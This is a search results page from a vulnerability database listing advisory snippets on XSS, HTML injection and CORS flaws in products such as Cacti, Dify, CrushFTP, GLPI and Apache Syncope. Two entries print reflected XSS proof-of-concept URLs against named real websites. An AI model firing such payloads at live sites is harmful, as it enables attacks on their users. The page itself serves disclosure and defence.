Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in
🔥 Daily Hot!
💪🏽 CPE Enhanced Advisories
🕶 Shadow Exploits
🕵🏼 Vulners CPE
🔐 Security news
💻 Exploit updates
📑 Blogs review
🐧 Linux vulnerabilities
🐞 Bugbounty
🤖 AI High Score
📰 CVE Feed
show all

8 matches found

Cvelist
Cvelistadded 2026/01/29 12:0 a.m.28 views

CVE-2025-45160

A HTML injection vulnerability exists in the file upload functionality of Cacti , , into the rendered page. NOTE: Multiple third-parties including the maintainer have stated that they cannot reproduce this issue after 1.2.27...

0.002EPSS
Exploits1References2
ATTACKERKB
ATTACKERKBadded 2025/12/18 12:0 a.m.4 views

CVE-2025-63386

A Cross-Origin Resource Sharing CORS misconfiguration vulnerability exists in Dify v1.9.1 in the /console/api/setup endpoint. The endpoint implements an insecure CORS policy that reflects any Origin header and enables Access-Control-Allow-Credentials: true, permitting arbitrary external domains t...

9.1CVSS5.7AI score0.00212EPSS
Exploits0References4
Positive Technologies
Positive Technologiesadded 2025/11/12 12:0 a.m.3 views

PT-2025-46678

Name of the Vulnerable Software and Affected Versions CrushFTP version 11.3.6 48 Description A Cross Site Scripting XSS issue exists in CrushFTP. The web-based server’s file sharing feature reflects the filename to an email body field without proper sanitization, leading to potential HTML...

6.1CVSS5.9AI score0.002EPSS
Exploits1References7
Openbugbounty
Openbugbountyadded 2022/11/25 11:55 a.m.11 views

ltv-online.info Cross Site Scripting vulnerability OBB-3070460

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

6.2AI score
Exploits0
CNNVD
CNNVDadded 2022/11/17 12:0 a.m.2 views

GLPI 跨站脚本漏洞

GLPI is an open source IT and asset management software for individual developers. The software provides a full-featured IT resource management interface that you can use to build databases to fully manage IT computers, monitors, servers, printers, network devices, phones, and even toner cartridg...

6.1CVSS6AI score0.00361EPSS
Exploits0References4
Cvelist
Cvelistadded 2020/05/04 12:27 p.m.15 views

CVE-2019-17557

It was found that the Apache Syncope EndUser UI login page prio to 2.0.15 and 2.1.6 reflects the successMessage parameters. By this mean, a user accessing the Enduser UI could execute javascript code from URL query string...

5.6AI score0.0122EPSS
Exploits0References1
Openbugbounty
Openbugbountyadded 2016/11/02 10:52 a.m.10 views

dance.nyc XSS vulnerability

Vulnerable URL: https://www.dance.nyc/search/?dir=%3C/script%3E%3Cscript%3Ealert'OPENBUGBOUNTY';%3C/script%3E%3Cscript%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 27.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 759468 VIP...

6.3AI score
Exploits0
seebug.org
seebug.orgadded 2014/07/02 12:0 a.m.16 views

PageAdmin最新版反射xss

简要描述: http://demo.pageadmin.net/ PageAdmin最新版反射xss 详细说明: 构造ID参数,双引号闭合前面。 即可植入html代码。 http://demo.pageadmin.net/e/aspx/advnew.aspx?id=1" http://demo.pageadmin.net/e/aspx/advnew.aspx?id=1%22%3C/div%3E%3Cimg/src=1%20onerror=alert%28/XSS/%29%3E 漏洞证明:...

7.1AI score
Exploits0
Rows per page
Query Builder